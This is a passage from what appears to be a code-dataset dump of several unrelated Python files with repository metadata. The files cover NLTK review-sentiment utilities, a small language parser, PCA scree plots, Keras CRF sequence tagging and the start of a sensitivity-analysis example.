] | null | null | null | 06-learning-to-classify-text/util/data_util.py | SolangeUG/nltk-book | 05051325a64836ae5c89d18f3c2145e9a6c4f0ae | [
"Apache-2.0"
] | null | null | null | import os
import gzip
import json
import numpy
import urllib.request
from nltk.sentiment.util import mark_negation
from nltk.corpus import stopwords, opinion_lexicon
from nltk.tokenize import sent_tokenize, word_tokenize
def download_data(dataset_name, directory_name):
"""
Download a given dataset name into a given directory
:param dataset_name: input dataset name
:param directory_name: input directory name
:return: None
"""
filename = 'reviews_%s_5.json' % dataset_name
filepath = os.path.join(directory_name, filename)
if os.path.exists(filepath):
print("Dataset %s has already been downloaded to %s" % (dataset_name, directory_name))
else:
url = 'http://snap.stanford.edu/data/amazon/productGraph/categoryFiles/%s.gz' % filename
urllib.request.urlretrieve(url, filepath + ".gz")
with gzip.open(filepath + ".gz", 'rb') as fin:
with open(filepath, 'wb') as fout:
fout.write(fin.read())
print("Downloaded dataset %s and saved it to %s" % (dataset_name, directory_name))
def load_data(dataset_name, directory_name):
"""
Load data in JSON format into memory
:param dataset_name: input dataset name
:param directory_name: input directory name
:return:
"""
filepath = os.path.join(directory_name, 'reviews_%s_5.json' % dataset_name)
if not os.path.exists(filepath):
download_data(dataset_name, directory_name)
data = []
with open(filepath, 'r') as f:
for line in f: # read file line by line
item_hash = hash(line) # we will use this later for partitioning our data
item = json.loads(line) # convert JSON string to Python dict
item['hash'] = item_hash # add hash for identification purposes
data.append(item)
print("Loaded %d data for dataset %s" % (len(data), dataset_name))
return data
def partition_train_validation_test(data):
"""
Partition a dataset into a training set, a validation set and a testing set
:param data: input dataset
:return: training, validation and testing set
"""
# 60% : modulus is 0, 1, 2, 3, 4, or 5
data_train = [item for item in data if item['hash'] % 10 <= 5]
# 20% : modulus is 6 or 7
data_valid = [item for item in data if item['hash'] % 10 in [6, 7]]
# 20% : modulus is 8 or 9
data_test = [item for item in data if item['hash'] % 10 in [8, 9]]
return data_train, data_valid, data_test
def tokenize_with_negation(text):
"""
Split a text into lower-case tokens, removing all punctuation tokens and stopwords
:param text: input text
:return: lowercase word tokens, without punctuation or stopwords
"""
# List of stop words in English
english_stopwords = set(stopwords.words('english'))
# Set of negated stopwords
negated_stopwords = set(word + "_NEG" for word in english_stopwords)
# List of all stopwords, including negated words
all_stopwords = english_stopwords.union(negated_stopwords)
tokens = []
for sent in sent_tokenize(text):
pretokens = word_tokenize(sent.lower())
# exclude punctuation
pretokens = [token for token in pretokens if any(char.isalpha() for char in token)]
# exclude negated stop words (tagged as negated)
pretokens = mark_negation(pretokens)
tokens.extend(token for token in pretokens if token not in all_stopwords)
return tokens
def pos_neg_fraction_with_negation(text):
"""
Compute the fraction of positive and negative words in a text, including negated words
:param text: input text
:return: a fraction of positive and negative words in the text
"""
# Sets of already known positive and negative words
positive_words = set(opinion_lexicon.positive())
negative_words = set(opinion_lexicon.negative())
# Set of all positive words including negated negative words
all_positive_words = positive_words.union({tag + "_NEG" for tag in negative_words})
# Set of all positive words including negated positive words
all_negative_words = negative_words.union({tag + "_NEG" for tag in positive_words})
tokens = tokenize_with_negation(text)
# count how many positive and negative words occur in the text
count_pos, count_neg = 0, 0
for token in tokens:
if token in all_positive_words:
count_pos += 1
if token in all_negative_words:
count_neg += 1
count_all = len(tokens)
if count_all != 0:
return count_pos/count_all, count_neg/count_all
else: # avoid division by zero
return 0., 0.
def dataset_to_targets(data):
"""
Convert training dataset to target vector
:param data:
:return:
"""
return numpy.array([item['overall'] for item in data])
def dataset_to_matrix_with_negation(data):
"""
Convert training dataset (with negation) into a matrix
:param data: training dataset
:return: matrix representation of training dataset
"""
# assuming the training dataset has a 'reviewText' key
return numpy.array([list(pos_neg_fraction_with_negation(item['reviewText'])) for item in data])
| 38.430657 | 100 | 0.677113 | 723 | 5,265 | 4.795297 | 0.24758 | 0.041246 | 0.028843 | 0.034612 | 0.24488 | 0.207961 | 0.124892 | 0.068936 | 0.068936 | 0.060571 | 0 | 0.00898 | 0.238557 | 5,265 | 136 | 101 | 38.713235 | 0.855824 | 0.318898 | 0 | 0.028571 | 0 | 0 | 0.082083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.114286 | 0 | 0.314286 | 0.042857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df8a5491c4a53b67677666f587efabbb177459a7 | 12,698 | py | Python | mdrparser.py | tringcooler/MODRON | c0cac79d1d008ffc51d9caf44f1cd299ca586682 | [
"MIT"
] | null | null | null | mdrparser.py | tringcooler/MODRON | c0cac79d1d008ffc51d9caf44f1cd299ca586682 | [
"MIT"
] | null | null | null | mdrparser.py | tringcooler/MODRON | c0cac79d1d008ffc51d9caf44f1cd299ca586682 | [
"MIT"
] | null | null | null | #! python3
# coding: utf-8
KLX_CMT = '#'
KLX_NL = '\n'
KW_LBL = ':'
KW_SPL = '/'
KW_BR1 = '('
KW_BR2 = ')'
PRMTCH = lambda s, d: len(s) >= len(d) and s[:len(d)] == d
class err_lexer(Exception):
pass
class err_syntax(Exception):
pass
class c_lexer:
def __init__(self, raw):
self.raw = raw
self.ridx = 0
self.stat = 'idle'
self.buf = ''
self.bpos = (1, 1)
self.cpos = (1, 1)
@property
def pos(self):
return self.bpos
def gc(self, peek = False):
i = self.ridx
if i >= len(self.raw):
return ''
c = self.raw[i]
if not peek:
self.ridx += 1
prow, pcol = self.cpos
if c == KLX_NL:
prow += 1
pcol = 0
pcol += 1
self.cpos = (prow, pcol)
return c
def rerr(self, e):
raise err_lexer(f'(ln:{self.cpos[0]} col:{self.cpos[1]}) {e}')
def parse(self):
while self.stat != 'end':
r = self.p1()
if r:
yield r
def p1(self):
r = self.pr_all()
if r:
return r
mtd = getattr(self, 'p_' + self.stat)
return mtd()
def pr_all(self):
c = self.gc(True)
if c == KLX_CMT:
r = ''
while c and c != KLX_NL:
self.gc()
r += c
c = self.gc(True)
return ('comment', r)
def p_idle(self):
self.bpos = self.cpos
c = self.gc()
if not c:
self.stat = 'end'
return ('eof', None)
elif c.isalpha() or c == '_':
self.buf += c
self.stat = 'word'
elif c.isdigit() or c == '-':
self.buf += c
self.stat = 'digit'
elif c.isspace():
if c == KLX_NL:
return ('newline', None)
elif c.isascii():
return ('symbol', c)
else:
self.rerr(f'invalid lex: {c}')
def p_word(self):
c = self.gc(True)
if c.isalpha() or c.isdigit() or c == '_':
self.buf += c
self.gc()
else:
buf = self.buf
self.buf = ''
self.stat = 'idle'
return ('word', buf)
def p_digit(self):
c = self.gc(True)
if c.isdigit():
self.buf += c
self.gc()
else:
buf = self.buf
self.buf = ''
self.stat = 'idle'
return ('digit', int(buf))
class c_parser:
def __init__(self, lexer, cmplr):
self.lx = lexer
self.cp = cmplr
self.reset()
def reset(self):
self.lxit = self.lx.parse()
self.curlx = (None, None)
self.la1lx = (None, None)
self.ntok()
self.ntok()
self.stat = 'idle'
self.ststk = []
self.ctxs = {}
self.progs = c_progs(self.cp)
self.cprog = None
@property
def pos(self):
return self.curlx[1]
@property
def ctok(self):
return self.curlx[0]
@property
def la1tok(self):
return self.la1lx[0]
def ntok(self):
self.curlx = self.la1lx
try:
self.la1lx = (next(self.lxit), self.lx.pos)
except StopIteration:
pass
def rerr(self, e):
raise err_syntax(f'(ln:{self.pos[0]} col:{self.pos[1]}) {e}')
def stgo(self, st):
ost = self.stat
if ost != st and ost in self.ctxs and not ost in self.ststk:
del self.ctxs[ost]
self.stat = st
def stpush(self):
self.ststk.append(self.stat)
def stpop(self):
if len(self.ststk) == 0:
self.rerr('unbalance stat')
self.stgo(self.ststk.pop())
def stback(self, bi):
if bi > len(self.ststk) or bi <= 0:
self.rerr('invalid ctx rel index')
return self.ststk[-bi]
def stctx(self, st = None):
if st is None:
st = self.stat
elif isinstance(st, int):
st = self.stback(st)
if not st in self.ctxs:
self.ctxs[st] = {}
return self.ctxs[st]
def chksym(self, c, la1 = True):
if la1:
tt, tv = self.la1tok
else:
tt, tv = self.ctok
return tt == 'symbol' and tv == c
def parse(self):
while self.stat != 'done':
self.p1()
return self.progs
def p1(self):
self.pr_all()
mtd = getattr(self, 'p_' + self.stat)
return mtd()
def pr_all(self):
tt, tv = self.ctok
while tt == 'comment':
self.ntok()
tt, tv = self.ctok
def p_idle(self):
tt, tv = self.ctok
if tt == 'newline':
self.ntok()
elif tt == 'word' and self.chksym(KW_LBL):
self.cprog = tv
self.stgo('labeled')
self.ntok()
self.ntok()
elif tt == 'eof':
self.stgo('done')
else:
self.rerr(f'invalid label: {tv}')
def p_labeled(self):
tt, tv = self.ctok
if tt == 'newline':
self.ntok()
elif tt == 'word' and self.chksym(KW_LBL):
self.stgo('idle')
elif tt == 'eof':
self.stgo('idle')
elif tt == 'word':
if not self.progs.seq(self.cprog):
self.rerr(f'redefined prog: {tv}')
self.stgo('sequence')
else:
if not self.progs.prog(self.cprog):
self.rerr(f'redefined prog: {tv}')
self.stgo('prog')
def p_sequence(self):
tt, tv = self.ctok
if tt == 'newline':
self.ntok()
elif tt == 'word' and self.chksym(KW_LBL):
self.stgo('idle')
elif tt == 'eof':
self.stgo('idle')
elif tt == 'word' and self.chksym(KW_BR1):
self.stgo('func')
elif tt == 'word':
if not self.progs.has(tv):
self.rerr(f'undefined prog name: {tv}')
self.progs.add(self.cprog, lambda s: (s.append(tv), s)[1])
self.ntok()
else:
self.rerr(f'invalid prog name: {tv}')
def p_func(self):
tt, tv = self.ctok
if tt == 'word' and self.chksym(KW_BR1):
ctx = self.stctx()
ctx['name'] = tv
ctx['args'] = []
self.stpush()
self.stgo('argseq')
self.ntok()
self.ntok()
elif self.chksym(KW_BR2, False):
ctx = self.stctx()
func = (ctx['name'], ctx['args'])
if not self.progs.get_builtin(func):
self.rerr(f'unknown builtin func: {func[0]}({len(func[1])})')
self.progs.add(self.cprog, lambda s: (s.append(func), s)[1])
self.stgo('sequence')
self.ntok()
else:
self.rerr(f'invalid function: {tv}')
def p_argseq(self):
tt, tv = self.ctok
if tt == 'word' or tt == 'digit':
ctx = self.stctx('func')
ctx['args'].append(tv)
if self.chksym(KW_BR2):
self.stpop()
self.ntok()
elif self.chksym(KW_BR2, False):
self.stpop()
else:
self.rerr(f'invalid argument: {tv}')
def p_prog(self):
tt, tv = self.ctok
if tt == 'newline':
self.ntok()
elif tt == 'word' and self.chksym(KW_LBL):
self.stgo('idle')
elif tt == 'eof':
self.stgo('idle')
else:
self.stgo('condi')
def p_pair(self):
tt, tv = self.ctok
if tt == 'digit':
sctx = self.stctx()
dctx = self.stctx(1)
if not 'seq' in dctx:
dctx['seq'] = []
dctx['seq'].append((sctx['1st'], tv))
self.stpop()
self.ntok()
else:
self.rerr(f'invalid pair: {tv}')
def p_condi(self):
tt, tv = self.ctok
if tt == 'digit' and self.chksym(KW_LBL):
ctx = self.stctx('pair')
ctx['1st'] = tv
self.stpush()
self.stgo('pair')
self.ntok()
self.ntok()
elif self.chksym(KW_SPL, False):
ctx = self.stctx()
if 'seq' in ctx:
condi = ctx['seq']
else:
condi = []
self.progs.add(self.cprog, lambda cp: cp.c(*condi))
self.stgo('opr')
self.ntok()
else:
self.rerr(f'invalid condition: {tv}')
def p_opr(self):
tt, tv = self.ctok
if tt == 'digit' and self.chksym(KW_LBL):
ctx = self.stctx('pair')
ctx['1st'] = tv
self.stpush()
self.stgo('pair')
self.ntok()
self.ntok()
elif tt == 'newline' or tt == 'eof':
ctx = self.stctx()
if 'seq' in ctx:
opr = ctx['seq']
else:
opr = []
self.progs.add(self.cprog, lambda cp: cp.t(*opr))
self.stgo('prog')
if tt != 'eof':
self.ntok()
else:
self.rerr(f'invalid operator: {tv}')
class c_progs:
def __init__(self, cmplr):
self.cp = cmplr
self.progs = {}
self.clog = []
self.log = []
self.obuf = []
def has(self, name):
return name in self.progs
def get_builtin(self, func_itm):
name, args = func_itm
mtd = None
mname = 'builtin_' + name + '_' + str(len(args))
if hasattr(self, mname):
r = getattr(self, mname)
if callable(r):
mtd = r
return mtd
def add(self, name, cb = None):
if not name in self.progs:
raise KeyError(f'invalid prog name: {name}')
if callable(cb):
self.progs[name] = cb(self.progs[name])
def prog(self, name):
if name in self.progs:
return False
self.progs[name] = self.cp
return True
def seq(self, name):
if name in self.progs:
return False
self.progs[name] = []
return True
def _run(self, name):
if not name in self.progs:
raise KeyError(f'invalid prog name: {name}')
prog = self.progs[name]
log = self.clog
if isinstance(prog, list):
log.append(f'seq {name}')
seq = prog
r = None
for p in seq:
if isinstance(p, tuple):
bfunc, args = p
mtd = self.get_builtin(p)
if not mtd:
self.rerr(
f'unknown builtin func: {bfunc}({len(args)})')
r = mtd(r, *args)
else:
r = self._run(p)
else:
log.append(f'prog {name}')
try:
cp = prog.p.r()
except:
print(f'error occurred at prog {name}')
raise
log.extend(cp.log)
log.append(f'looped {cp.turns}')
r = cp.m
return r
def run(self, name):
self.clog = []
self.obuf = []
r = self._run(name)
self.log.extend(self.clog)
return self.obuf
def showcode(self, name):
if not name in self.progs:
raise KeyError(f'invalid prog name: {name}')
print(f'{name}:')
prog = self.progs[name]
if isinstance(prog, list):
seq = prog
for p in seq:
if isinstance(p, tuple):
bfunc, args = p
print(f'{bfunc}(', *args, ')')
else:
self.showcode(p)
else:
seq = prog.p.s.seq
for i, (cshift, condi, op) in enumerate(seq):
print('period', i+1)
print(' cshift:', cshift)
print(' condi:', condi)
print(' op:', op)
def builtin_out_0(self, last):
mdr = last
self.obuf.append(mdr.allregs)
return mdr
def builtin_out_1(self, last, p):
mdr = last
self.obuf.append(mdr.getreg(p))
return mdr
if __name__ == '__main__':
def test1():
from modron import c_modron
with open('test1.mdr.txt', 'r') as fd:
raw = fd.read()
md = c_modron()
p = c_parser(c_lexer(raw), md.cmplr)
p.parse()
return p, md
p, md = test1()
| 26.509395 | 77 | 0.448968 | 1,557 | 12,698 | 3.60501 | 0.127168 | 0.036879 | 0.020844 | 0.025655 | 0.409941 | 0.381614 | 0.333155 | 0.274185 | 0.229111 | 0.21664 | 0 | 0.007142 | 0.415577 | 12,698 | 478 | 78 | 26.564854 | 0.749225 | 0.001811 | 0 | 0.440476 | 0 | 0 | 0.079145 | 0.001973 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111905 | false | 0.007143 | 0.002381 | 0.011905 | 0.197619 | 0.016667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df8a6798247986c50a85f8670d6092c7023d686b | 4,501 | py | Python | application/pca.py | AdamuKaapan/natrium | b94527b287ec2c626be2fe37208bb043aab68b48 | [
"BSD-2-Clause"
] | null | null | null | application/pca.py | AdamuKaapan/natrium | b94527b287ec2c626be2fe37208bb043aab68b48 | [
"BSD-2-Clause"
] | 13 | 2018-04-03T20:34:17.000Z | 2018-04-20T08:33:50.000Z | application/pca.py | AdamuKaapan/natrium | b94527b287ec2c626be2fe37208bb043aab68b48 | [
"BSD-2-Clause"
] | null | null | null | #! /usr/bin/env python3
""" Standalone script for evaluating a dataset.
Calculates measures of label quality and tries to spot outliers.
Usage:
python3 investigate.py <filename>"""
import argparse
import pandas as pd
import numpy as np
import math
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def center_and_scale(frame):
"""Centers and scales a pandas dataframe"""
def center_scale_col(col):
if (pd.api.types.is_numeric_dtype(col)):
mean = col.mean()
dev = col.std()
col = (mean - col)/dev
return col
return frame.apply(center_scale_col)
def calculate_scree(S):
"""Calculates information for scree plot"""
S2= S**2
S2 = S2/sum(S2)
return S2, np.cumsum(S2)
def plot_scree(scores, cum_scores):
"""Displays the scree and cumulative scree plot in the same figure"""
x = np.linspace(1, scores.shape[0], scores.shape[0])
fig, ax = plt.subplots()
ax.plot(x, scores,label="variance")
ax.plot(x, cum_scores, label="cumulative_variance")
ax.set(xlabel='Principal Component', ylabel='Variance',
title='Scree Plots')
ax.grid(True)
ax.legend()
def calculate_loading(V):
return np.divide(V**2,np.sign(V))
def plot_loading_vectors(V2):
size = math.ceil(math.sqrt(V2.shape[0]))
fig, axes = plt.subplots(size, size, figsize=(19,15))
vectors = [label if label % 2 != 0 else "" for label in range(1,23)]
for i, row in enumerate(axes):
for j, ax in enumerate(row):
idx = i*size+j
if (idx < V2.shape[0]):
graph = ax.bar(range(1,23), V2[idx],tick_label=vectors)
y_lim = np.max(np.abs(V2[idx])) + 0.1
ax.set_ylim([-y_lim, y_lim])
ax.set(title="Vector %d" % (idx + 1), xlabel="Original Dimension", ylabel="Importance" )
ax.axhline(lw = 0.5,color="black")
else:
ax.axis("off")
fig.suptitle("Loading Vector Plots", size = 18)
fig.tight_layout()
fig.subplots_adjust(top=0.9)
plt.savefig("../visualizations/loading_vectors.png")
def plot_features_3d(size, data, labels, cols, axes_labels, series_names, series_label, title):
"""makes a 3d plot of a set of data"""
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
sample = labels.sample(n=size)
for label, series in sample.groupby(sample):
idx = series.index
ax.scatter(data.ix[idx][cols[0]], data.ix[idx][cols[1]], data.ix[idx][cols[2]], depthshade=False, label = label)
ax.set_xlabel(axes_labels[0])
ax.set_ylabel(axes_labels[1])
ax.set_zlabel(axes_labels[2])
ax.set_title(title, y=1.08)
ax.legend()
def main():
"""The executable to read in the specified data file and perform the
investigatory operations."""
parser = argparse.ArgumentParser()
parser.add_argument(
"input_file",
type=argparse.FileType("r"),
help="The path of the data file to read in.")
args = parser.parse_args()
#read the dataframe in memory friendly chunks
data_frame = pd.read_pickle(args.input_file.name).infer_objects()
genre_list = ["Punk", "Electronic","RnB", "Rap", "Country", "Metal", "Pop", "Rock"]
data_frame = data_frame[data_frame["genre"].isin(genre_list)]
print(data_frame.columns)
data_frame = center_and_scale(data_frame)
labels = data_frame["genre"]
data_frame = data_frame.drop(columns=["genre", "release_year"])
u, s, v = np.linalg.svd(data_frame, full_matrices = False)
ur = np.dot(u, np.diag(s))
regular_scores = pd.DataFrame(data=ur, index = data_frame.index, columns = range(1, ur.shape[1]+1))
scores, cumulative_scores = calculate_scree(s)
plot_scree(scores, cumulative_scores)
v2 = calculate_loading(v)
plot_loading_vectors(v2)
plot_features_3d(
150,
data_frame,
labels,
["duration", "word_count", "rhyme_value"],
["Duration (s)", "Words (ct)", "Rhyme Index"],
genre_list,
"genre",
"Duration v. Wordcount v. Rhyme Index")
plot_features_3d(
150,
regular_scores,
labels,
[1, 2, 3],
["PC 1", "PC 2", "PC 3"],
genre_list,
"genre",
"Vector 1 v. Vector 2 v. Vector 3")
plt.show()
if __name__ == "__main__":
main()
| 31.041379 | 120 | 0.614974 | 629 | 4,501 | 4.260731 | 0.36725 | 0.043657 | 0.015672 | 0.014552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023655 | 0.248611 | 4,501 | 144 | 121 | 31.256944 | 0.768776 | 0.107976 | 0 | 0.116505 | 0 | 0 | 0.111362 | 0.009301 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07767 | false | 0 | 0.07767 | 0.009709 | 0.194175 | 0.009709 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df8adf88d2253216c359a48351327728bebbd134 | 4,241 | py | Python | seq2annotation/trainer/cli_keras_with_static_constraint.py | shfshf/seq2annotation | d4bf88a869631b43fa2974c2ffa1c5dd6a7623ed | [
"Apache-2.0"
] | 90 | 2018-11-29T07:05:16.000Z | 2021-11-22T11:32:58.000Z | seq2annotation/trainer/cli_keras_with_static_constraint.py | shfshf/seq2annotation | d4bf88a869631b43fa2974c2ffa1c5dd6a7623ed | [
"Apache-2.0"
] | 50 | 2019-06-27T07:11:18.000Z | 2022-02-10T00:01:02.000Z | seq2annotation/trainer/cli_keras_with_static_constraint.py | lanSeFangZhou/seq2annotation | a824520d46f0b3d70268fae422976a5ce1b3f4ce | [
"Apache-2.0"
] | 23 | 2019-01-03T14:57:15.000Z | 2022-03-08T07:50:33.000Z | import json
import os
from collections import Counter
import numpy as np
import tensorflow as tf
from tensorflow.python.keras import models
from tensorflow.python.keras.layers import Embedding, Bidirectional, LSTM
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras import layers
from ioflow.configure import read_configure
from ioflow.corpus import get_corpus_processor
from seq2annotation.input import generate_tagset, Lookuper, \
index_table_from_file
from tf_crf_layer.crf_helper import allowed_transitions
from tf_crf_layer.layer import CRF
from tf_crf_layer.loss import crf_loss
from tf_crf_layer.metrics import crf_accuracy
from tokenizer_tools.tagset.converter.offset_to_biluo import offset_to_biluo
config = read_configure()
corpus = get_corpus_processor(config)
corpus.prepare()
train_data_generator_func = corpus.get_generator_func(corpus.TRAIN)
eval_data_generator_func = corpus.get_generator_func(corpus.EVAL)
corpus_meta_data = corpus.get_meta_info()
tags_data = generate_tagset(corpus_meta_data['tags'])
train_data = list(train_data_generator_func())
eval_data = list(eval_data_generator_func())
tag_lookuper = Lookuper({v: i for i, v in enumerate(tags_data)})
vocab_data_file = os.path.join(os.path.dirname(__file__), '../data/unicode_char_list.txt')
vocabulary_lookuper = index_table_from_file(vocab_data_file)
def one_hot(a, num_classes):
return np.squeeze(np.eye(num_classes)[a.reshape(-1)])
def preprocss(data, maxlen=None, intent_lookup_table=None):
raw_x = []
raw_y = []
raw_intent = []
for offset_data in data:
tags = offset_to_biluo(offset_data)
words = offset_data.text
# label = offset_data.extra_attr['domain']
tag_ids = [tag_lookuper.lookup(i) for i in tags]
word_ids = [vocabulary_lookuper.lookup(i) for i in words]
raw_x.append(word_ids)
raw_y.append(tag_ids)
# raw_intent.append(label)
# if not intent_lookup_table:
# raw_intent_set = list(set(raw_intent))
# intent_lookup_table = Lookuper({v: i for i, v in enumerate(raw_intent_set)})
# intent_int_list = [intent_lookup_table.lookup(i) for i in raw_intent]
if not maxlen:
maxlen = max(len(s) for s in raw_x)
x = tf.keras.preprocessing.sequence.pad_sequences(raw_x, maxlen,
padding='post') # right padding
# lef padded with -1. Indeed, any integer works as it will be masked
# y_pos = pad_sequences(y_pos, maxlen, value=-1)
# y_chunk = pad_sequences(y_chunk, maxlen, value=-1)
y = tf.keras.preprocessing.sequence.pad_sequences(raw_y, maxlen, value=0,
padding='post')
# intent_np_array = np.array(intent_int_list)
# intent_one_hot = one_hot(intent_np_array, np.max(intent_np_array) + 1)
intent_one_hot = None
return x, intent_one_hot, y, intent_lookup_table
train_x, train_intent, train_y, intent_lookup_table = preprocss(train_data, 25)
test_x, test_intent, test_y, _ = preprocss(eval_data, 25, intent_lookup_table)
EPOCHS = 10
EMBED_DIM = 64
BiRNN_UNITS = 200
vacab_size = vocabulary_lookuper.size()
tag_size = tag_lookuper.size()
allowed = allowed_transitions("BIOUL", tag_lookuper.inverse_index_table)
model = Sequential()
model.add(Embedding(vacab_size, EMBED_DIM, mask_zero=True))
model.add(Bidirectional(LSTM(BiRNN_UNITS // 2, return_sequences=True)))
model.add(CRF(tag_size, transition_constraint=allowed))
# print model summary
model.summary()
callbacks_list = []
# tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=config['summary_log_dir'])
# callbacks_list.append(tensorboard_callback)
#
# checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
# os.path.join(config['model_dir'], 'cp-{epoch:04d}.ckpt'),
# load_weights_on_restart=True,
# verbose=1
# )
# callbacks_list.append(checkpoint_callback)
model.compile('adam', loss=crf_loss, metrics=[crf_accuracy])
model.fit(
[train_x, train_intent], train_y,
epochs=EPOCHS,
validation_data=[[test_x, test_intent], test_y],
callbacks=callbacks_list
)
# tf.keras.experimental.export_saved_model(model, config['saved_model_dir'])
| 32.875969 | 90 | 0.741335 | 614 | 4,241 | 4.806189 | 0.288274 | 0.028465 | 0.040325 | 0.033887 | 0.163673 | 0.120637 | 0.077262 | 0.048119 | 0 | 0 | 0 | 0.006175 | 0.159868 | 4,241 | 128 | 91 | 33.132813 | 0.82206 | 0.240981 | 0 | 0.027778 | 0 | 0 | 0.015649 | 0.009077 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.236111 | 0.013889 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df8ecfcf14d1349c62ad20d2cef2d653f9568c1a | 1,932 | py | Python | source_code/scree_plot.py | sdyinzhen/AutoBEL | 213011ef8c6d2bcc16ac92a263e615f4a7033ff4 | [
"MIT"
] | 8 | 2020-05-15T13:57:54.000Z | 2022-02-23T23:21:15.000Z | source_code/scree_plot.py | sdyinzhen/AutoBEL | 213011ef8c6d2bcc16ac92a263e615f4a7033ff4 | [
"MIT"
] | 1 | 2020-02-28T13:42:45.000Z | 2020-03-02T19:12:22.000Z | source_code/scree_plot.py | sdyinzhen/AutoBEL | 213011ef8c6d2bcc16ac92a263e615f4a7033ff4 | [
"MIT"
] | 7 | 2019-10-24T09:57:25.000Z | 2022-02-23T23:20:50.000Z | #Author: David Zhen Yin
#Contact: yinzhen@stanford.edu
#Date: September 11, 2018
import numpy as np
import matplotlib.pyplot as plt
def scree_plot(input_data, data_name, keep_info_prcnt, plotORnot):
'''This is the PCA scree plot function,
This function also report the number of PCs that preserves the assigned amount of information of the input_data.
input_data: orignial input matrix for PCA analys; pc_num: number of pc components.
data_name: name of the input data, e.g. 'model', 'data'
keep_info_prcnt: the amount of infomation (cumulative variance ratio) to preserve after PCA.
plotORnot: 'plot' - will produce the screet plot, 'not' - no plot, only return the pcnum for the required prcnt variance.
'''
X = input_data-input_data.mean(axis=0)
eig_val, eig_vec = np.linalg.eig(X.dot(X.transpose()))
eigval_sum = np.sum(eig_val)
infor_list = np.cumsum(eig_val)/eigval_sum
infor_list = np.array(np.where(infor_list<=keep_info_prcnt/100))[0]
if plotORnot == 'plot':
plt.figure(figsize=(6, 4))
plt.plot(np.arange(1,len(eig_val)+1), np.cumsum(eig_val)/eigval_sum, \
marker='o', markersize=5, linestyle = 'dashed', color='blue')
plt.xticks(fontsize = 14)
plt.yticks(np.arange(0,1.01,0.1),fontsize = 14)
plt.xlabel('number of PCs', fontsize = 12, weight='bold')
plt.ylabel('cumulative variance ratio', fontsize = 12, weight='bold')
plt.title('Dimension reduction of ' + data_name +' - PCA scree plot', fontsize=18, loc='left', style='italic')
plt.grid(linestyle='dashed')
plt.axhline(y=keep_info_prcnt/100, linewidth=2, color='red', linestyle='--')
plt.axvline(x=infor_list[-1]+1, linewidth=2, color='red', linestyle='--')
plt.text(infor_list[-1]-2, -0.06, str(infor_list[-1]+1), fontsize=14, weight='bold', color='red')
return infor_list[-1]+1 | 55.2 | 128 | 0.669772 | 294 | 1,932 | 4.285714 | 0.44898 | 0.05 | 0.04127 | 0.02619 | 0.120635 | 0.084127 | 0 | 0 | 0 | 0 | 0 | 0.032092 | 0.193582 | 1,932 | 35 | 129 | 55.2 | 0.776637 | 0.30176 | 0 | 0 | 0 | 0 | 0.103156 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df911bbf31e9124090bd4e868dde32db29f1bbb5 | 2,395 | py | Python | examples/e3_sensitivity_analysis_example.py | RWTH-EBC/AixCaliBuHA | 2f01035d3c966b465dedf9243674fbb3b35ac7f0 | [
"MIT"
] | 2 | 2021-09-01T07:25:28.000Z | 2021-09-16T16:47:45.000Z | examples/e3_sensitivity_analysis_example.py | RWTH-EBC/AixCaliBuHA | 2f01035d3c966b465dedf9243674fbb3b35ac7f0 | [
"MIT"
] | 19 | 2021-09-06T14:36:44.000Z | 2022-03-30T06:20:42.000Z | examples/e3_sensitivity_analysis_example.py | RWTH-EBC/AixCaliBuHA | 2f01035d3c966b465dedf9243674fbb3b35ac7f0 | [
"MIT"
] | null | null | null | """
Example file for the senstivity_analyzer package. The usage of modules and classes inside
the senanalyzer package should be clear when looking at the examples.
If not, please raise an issue.
Goals of this part of the examples:
1. Learn how to execute a sensitivity analysis
2. Learn how to automatically select sensitive tuner parameters
"""
from aixcalibuha import SobolAnalyzer
def run_sensitivity_analysis(sim_api, cal_classes):
"""
Example process of a sensitivity analysis.
First, the sensitivity problem is constructed, in this example
the `morris` method is chosen.
Afterwards, the sen_analyzer class is instantiated to run the
sensitivity analysis in the next step.
The result of this analysis is then printed to the user.
The automatic_select function is presented as-well, using a threshold of 1
and the default `mu_star` criterion.
:param aixcalibuha.simulationapi.SimulationAPI sim_api:
Simulation api to run the simulation for the sensitivtiy analysis
:param list cal_classes:
